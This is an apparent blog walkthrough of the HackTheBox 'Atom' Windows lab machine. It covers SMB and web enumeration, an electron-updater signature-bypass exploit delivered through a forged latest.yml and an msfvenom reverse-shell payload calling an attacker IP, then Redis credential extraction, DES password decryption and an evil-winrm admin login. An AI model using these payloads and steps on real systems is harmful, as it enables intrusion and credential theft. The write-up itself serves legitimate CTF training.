HTB - Atom

HTB – Atom

In this walk through, we will be going through the Atom room from HackTheBox. This room is rated as Medium on the platform and it consists of exploitation of an Electron application to get initial access and for privilege escalation, exploitation of PortableKanban is required to get root. So, let’s get started without any delay.

Atom

Machine Info:

TitleAtom
IPaddress10.10.10.237
DifficultyMedium
OSWindows
DescriptionAtom is a Medium Windows machine that requires exploitation of a RCE in Electron software to get the foothold. For privilege escalation, PortableKanban was exploited to get root.

Enumeration:

  • I started off with my regular aggressive nmap scan and found a couple of ports opened – 80, 443 (HTTP/HTTPS), 135 (RPC) and 445 (SMB).

$ sudo nmap -A 10.10.10.237
[sudo] password for wh1terose: 

Nmap scan report for 10.10.10.237
Host is up (0.22s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| vulners: 
|   cpe:/a:apache:http_server:2.4.46: 
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-36160	5.0	https://vulners.com/cve/CVE-2021-36160
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-30641	5.0	https://vulners.com/cve/CVE-2021-30641
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-13950	5.0	https://vulners.com/cve/CVE-2020-13950
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|_    	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
135/tcp open  msrpc        Microsoft Windows RPC
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| vulners: 
|   cpe:/a:apache:http_server:2.4.46: 
|     	PACKETSTORM:171631	7.5	https://vulners.com/packetstorm/PACKETSTORM:171631	*EXPLOIT*
|     	EDB-ID:51193	7.5	https://vulners.com/exploitdb/EDB-ID:51193	*EXPLOIT*
|     	CVE-2022-31813	7.5	https://vulners.com/cve/CVE-2022-31813
|     	CVE-2022-23943	7.5	https://vulners.com/cve/CVE-2022-23943
|     	CVE-2022-22720	7.5	https://vulners.com/cve/CVE-2022-22720
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CNVD-2022-73123	7.5	https://vulners.com/cnvd/CNVD-2022-73123
|     	CNVD-2022-03225	7.5	https://vulners.com/cnvd/CNVD-2022-03225
|     	CNVD-2021-102386	7.5	https://vulners.com/cnvd/CNVD-2021-102386
|     	1337DAY-ID-38427	7.5	https://vulners.com/zdt/1337DAY-ID-38427*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CNVD-2022-03224	6.8	https://vulners.com/cnvd/CNVD-2022-03224
|     	AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	6.8	https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C	*EXPLOIT*
|     	8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	6.8	https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2	*EXPLOIT*
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	4373C92A-2755-5538-9C91-0469C995AA9B	6.8	https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B	*EXPLOIT*
|     	36618CA8-9316-59CA-B748-82F15F407C4F	6.8	https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F	*EXPLOIT*
|     	0095E929-7573-5E4A-A7FA-F6598A35E8DE	6.8	https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE	*EXPLOIT*
|     	OSV:BIT-2023-31122	6.4	https://vulners.com/osv/OSV:BIT-2023-31122
|     	CVE-2022-28615	6.4	https://vulners.com/cve/CVE-2022-28615
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2022-22721	5.8	https://vulners.com/cve/CVE-2022-22721
|     	CVE-2022-36760	5.1	https://vulners.com/cve/CVE-2022-36760
|     	OSV:BIT-2023-45802	5.0	https://vulners.com/osv/OSV:BIT-2023-45802
|     	OSV:BIT-2023-43622	5.0	https://vulners.com/osv/OSV:BIT-2023-43622
|     	F7F6E599-CEF4-5E03-8E10-FE18C4101E38	5.0	https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38	*EXPLOIT*
|     	E5C174E5-D6E8-56E0-8403-D287DE52EB3F	5.0	https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F	*EXPLOIT*
|     	DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	5.0	https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A	*EXPLOIT*
|     	CVE-2022-37436	5.0	https://vulners.com/cve/CVE-2022-37436
|     	CVE-2022-30556	5.0	https://vulners.com/cve/CVE-2022-30556
|     	CVE-2022-29404	5.0	https://vulners.com/cve/CVE-2022-29404
|     	CVE-2022-28614	5.0	https://vulners.com/cve/CVE-2022-28614
|     	CVE-2022-26377	5.0	https://vulners.com/cve/CVE-2022-26377
|     	CVE-2022-22719	5.0	https://vulners.com/cve/CVE-2022-22719
|     	CVE-2021-36160	5.0	https://vulners.com/cve/CVE-2021-36160
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-30641	5.0	https://vulners.com/cve/CVE-2021-30641
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-9490	5.0	https://vulners.com/cve/CVE-2020-9490
|     	CVE-2020-13950	5.0	https://vulners.com/cve/CVE-2020-13950
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2006-20001	5.0	https://vulners.com/cve/CVE-2006-20001
|     	CNVD-2023-93320	5.0	https://vulners.com/cnvd/CNVD-2023-93320
|     	CNVD-2023-80558	5.0	https://vulners.com/cnvd/CNVD-2023-80558
|     	CNVD-2022-73122	5.0	https://vulners.com/cnvd/CNVD-2022-73122
|     	CNVD-2022-53584	5.0	https://vulners.com/cnvd/CNVD-2022-53584
|     	CNVD-2022-53582	5.0	https://vulners.com/cnvd/CNVD-2022-53582
|     	CNVD-2022-03223	5.0	https://vulners.com/cnvd/CNVD-2022-03223
|     	C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	5.0	https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B	*EXPLOIT*
|     	BD3652A9-D066-57BA-9943-4E34970463B9	5.0	https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9	*EXPLOIT*
|     	B0208442-6E17-5772-B12D-B5BE30FA5540	5.0	https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540	*EXPLOIT*
|     	A820A056-9F91-5059-B0BC-8D92C7A31A52	5.0	https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52	*EXPLOIT*
|     	9814661A-35A4-5DB7-BB25-A1040F365C81	5.0	https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81	*EXPLOIT*
|     	5A864BCC-B490-5532-83AB-2E4109BB3C31	5.0	https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31	*EXPLOIT*
|_    	17C6AD2A-8469-56C8-BBBE-1764D0DF1680	5.0	https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680	*EXPLOIT*
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-12-20T08:19:01-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-20T16:19:02
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   216.79 ms 10.10.14.1
2   217.48 ms 10.10.10.237

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.16 seconds

nmap aggressive scan

nmap scan

nmap scan

  • I also performed an alternate all ports nmap scan to see if i missed something and got two more interesting entries – 5985 (WinRM) and 6379 (Redis).

sudo nmap -sS -p- -T5 10.10.10.237

all ports scan

  • Enumerated the web server on port 443 and found a static website for a software solution company. The “Download for Windows” button downloads a zip file containing the software’s binary. Apart from the, the footer section reveals a potential username – MrR3boot.

Heed Solutions website

  • Fired gobuster on the webserver, found a bunch of directories but nothing interesting enough.

gobuster dir -k -u http://10.10.10.237/ -w  ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

  • Next, pivoted my enumeration to SMB. List the shares with NULL authentication and found an interesting one – Sotware_Updates.

smbclient -L 10.10.10.237

SMB enumeration

  • Accessed the share and download the UAT_Testing_Procedures.pdf file lying there.

$ smbclient //10.10.10.237/Software_Updates
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Dec 20 22:23:31 2023
  ..                                  D        0  Wed Dec 20 22:23:31 2023
  client1                             D        0  Wed Dec 20 22:23:31 2023
  client2                             D        0  Wed Dec 20 22:23:31 2023
  client3                             D        0  Wed Dec 20 22:23:31 2023
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 16:48:08 2021

		4413951 blocks of size 4096. 1367645 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (32.8 KiloBytes/sec) (average 32.8 KiloBytes/sec)

Getting the pdf from Software_Updates

  • Upon peeking inside the PDF file reveals the QA process that is used by the company for any new update related to the binary. For that, we have to put the file in one of the clients folder and one of the QA will test and check it. That means, if we can trick the QA to execute our payload instead of the real updated binary, then we can get an initial foothold on to the system.

Heed V1.0

What about QA?

  • I also executed the binary using wine to see if it got something interesting but found nothing inside it.

wine heedv1\ Setup\ 1.0.0.exe

Heed program

  • Next, i checked if we can write to the client folder by putting a test file on it.

$ touch test
$ smbclient //10.10.10.237/Software_Updates
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Dec 20 22:33:42 2023
  ..                                  D        0  Wed Dec 20 22:33:42 2023
  client1                             D        0  Wed Dec 20 22:33:42 2023
  client2                             D        0  Wed Dec 20 22:33:42 2023
  client3                             D        0  Wed Dec 20 22:33:42 2023
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 16:48:08 2021

		4413951 blocks of size 4096. 1368383 blocks available
smb: \> cd client1
smb: \client1\> put test 
putting file test as \client1\test (0.0 kb/s) (average 0.0 kb/s)
smb: \client1\> ls
  .                                   D        0  Wed Dec 20 22:33:53 2023
  ..                                  D        0  Wed Dec 20 22:33:53 2023
  test                                A        0  Wed Dec 20 22:33:53 2023

		4413951 blocks of size 4096. 1368383 blocks available
smb: \client1\> 

put the file on share

Initial Access:

  • The concerned application is build with electron. I looked online for any known vulnerability for the electron updater or builder and found one. It seems like we have a Electron update signature bypass vulnerability here. That means, we can bypass the signature used to sign the update the binary and thus can fool the victim into believing that it is a legit update.

Resource: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

version: 1.2.3
files:
- url: v’ulnerable-app-setup-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z

  • I first created a meterpreter payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f exe > heed_update.exe

creating a reverse shell binary

  • Calculated its SHA512 hash and encoded it in base64.

sha512sum heed_update.exe | cut -d ' ' -f1 | xxd -r -p | base64 -w0

cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA==

base64 encode

  • Next, i generate a latest.yml file with below contents that has the file name, size and SHA512 hash of it.

version: 1.0.1
files:
- url: h'eed_update.exe
  sha512: cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA==
  size: 73984
path: h'eed_update.exe
sha512: cvHPi57NWCWTzW04s+OjyTbZKR5hvqO3XZPo/0eIiAXBGGrp3QTkyEYT7o+WUQFJct7D905glGWr1421O/5UqA==

cat latest.yml

  • Changed the file name to the below one.

mv heed_update.exe h\'eed_update.exe

heed_update.exe

  • Started my Metasploit multi handler and uploaded the binary and yaml file to the share.

$ smbclient //10.10.10.237/Software_Updates
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (0.4 kb/s) (average 0.4 kb/s)
smb: \client1\> put "h'eed_update.exe"
putting file h'eed_update.exe as \client1\h'eed_update.exe (57.6 kb/s) (average 38.6 kb/s)
smb: \client1\> exit

put latest.yml

  • At this point, i was unable to get a callback from the target to my listener. I figured out that there could be a size issue with the binary as meterpreter payload generally of larger size. I recreated another payload, this time a generic reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f exe > shell.exe

  • Calculated its SHA512 hash like before.

sha512sum shell.exe | cut -d ' ' -f1 | xxd -r -p | base64 -w0

XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ==

  • Added it to the latest.yml file.

version: 1.0.1
files:
- url: s'hell.exe
  sha512: XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ==
  size: 7168
path: s'hell.exe
sha512: XlmczZbx9YoVRqq2Xw3OdhiCd65xv0bFnrJrszzfB8VRsZrPl7JFw7/orLIEhluYtMrb2V50rqm6sE23PgotVQ==

  • Changed the payload name.

mv shell.exe s\'hell.exe

  • Uploaded the payload along with the yml file to the share.

$ smbclient //10.10.10.237/Software_Updates
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (0.4 kb/s) (average 0.4 kb/s)
smb: \client1\> put s'hell.exe
putting file s'hell.exe as \client1\s'hell.exe (11.2 kb/s) (average 5.5 kb/s)
smb: \client1\> exit

  • Got a connection back within a minute as user Jason at my netcat listener.

nc -lvnp 4444

netcat listener

  • Captured the user flag.

user flag

Privilege Escalation:

  • Next, i wandered around the file system and found an interesting folder in Jason’s Downloads directory – PortableKanban. I looked online for it and it seems like it is a task management tool.

PortableKanban

  • Looked for any privilege escalation exploits for it and got one – PortableKanban Encrypted Password retrieval. The exploit decrypts a DES password with a known key and it requires a PortableKanban.pk3 file as an argument. As per the below output, we have a PortableKanban.pk3.lock file in it.

PortableKanban files

  • Moved the file to the Software_updates directory. So that we can download it via SMB to our local machine.

PortableKanban.pk3.lock

get PortableKanban.pk3.lock

  • Next, used the below exploit to extract the password from the file. However, got hit by an error.

PortableKanban 4.3.6578.38136

Exploit: https://www.exploit-db.com/exploits/49409

python3 exploit.py PortableKanban.pk3.lock

  • Peeked inside the PortableKanban.pk3.lock file and it seems like it is calling for the executable file in the PortableKanban directory.

head PortableKanban.pk3.lock

head PortableKanban.pk3.lock

  • Back in the PortableKanban directory, i looked inside the cfg file and got an interesting entry there – “DbEncPassword: Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb”

type PortableKanban.cfg

type PortableKanban.cfg

  • We know that the server is running redis on it. Used the below command to check for any stored credentials. Found out that we can log into the server as kidvscat_yes_kidvscat without any password.

type redis.windows-service.conf | findstr requirepass

redis service

  • Next, i used the redis-cli to log in as kidvscat_yes_kidvscat and extracted the pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 from it which gives me the DES encrypted admin password.

redis-cli -h 10.10.10.237

auth kidvscat_yes_kidvscat

keys *

get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0

redis cli

  • As per the exploit code, we already know the DES Key that was being used for the decryption.

DES Key

  • So, we decrypted the admin’s encrypted password manually using Cyberchef with the known keys.

Cyberchef base64 decode

  • At last, used Evil-WinRM to get a shell on the target with the Admin credentials and captured the root flag.

evil-winrm.rb -i 10.10.10.237 -u Administrator -p kidvscat_admin_@123

Getting root and root.txt

Machine completed

Also Read: HTB – Active

Conclusion:

Conclusion

So that was “Atom” for you. The machine features a hosting of a Electron software (Electron Builder) where a vulnerability in signature validation can lead to remote command execution and that’s how we got a foothold on system as user jason. By capturing the password of Redis service from configuration file we got the encrypted password of user Administrator. By using exploitation for the PortableKanban the administrator’s password then was decrypted and thus login through winrm was done at the system as root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top